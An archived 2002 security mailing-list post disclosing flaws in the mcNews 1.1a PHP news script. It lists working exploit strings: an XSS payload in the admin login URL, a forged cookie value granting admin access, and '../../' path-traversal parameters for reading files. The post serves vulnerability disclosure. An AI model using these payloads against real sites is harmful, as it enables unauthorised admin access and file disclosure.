Security holes : mcNews

From: frog frog (leseulfrogat_private)
Date: Fri May 17 2002 - 10:11:26 PDT

Next message: JNJ: "Re: Sonicwall SOHO Content Blocking Script Injection, LogFile Denial of Service"

Previous message: Bogdan Tomchuk: "Re: PDF modifications?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) Product : mcNews 1.1a http://www.phpforums.net Problems : - XSS - Path Disclosure - Including file - Admin access Exploits : - /admin/login.php?path="></form*><form name=a*><input name=i value=XSS*><script*>alert(document.a.i.value) </script*> without '*' - Setcookie "mcNews,frog" on admin pages - /admin/design.php?voir=1&skinfile=../../file/to/view + mcNews cookie - /admin/header.php?voir=1&skinfile=../../file/to/view without mcNews cookie - /admin/[header or design].php?voir=1&skinfile=non- existant-file More details : in french : http://www.ifrance.com/kitetoua/tuto/mcNews.txt translated by Google : http://translate.google.com/translate?u=http%3A%2F% 2Fwww.ifrance.com%2Fkitetoua%2Ftuto% 2FmcNews.txt&langpair=fr%7Cen&hl=fr&ie=UTF8&oe=UTF8&prev=% 2Flanguage_tools frog-m@n

Next message: JNJ: "Re: Sonicwall SOHO Content Blocking Script Injection, LogFile Denial of Service"
Previous message: Bogdan Tomchuk: "Re: PDF modifications?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri May 17 2002 - 15:11:03 PDT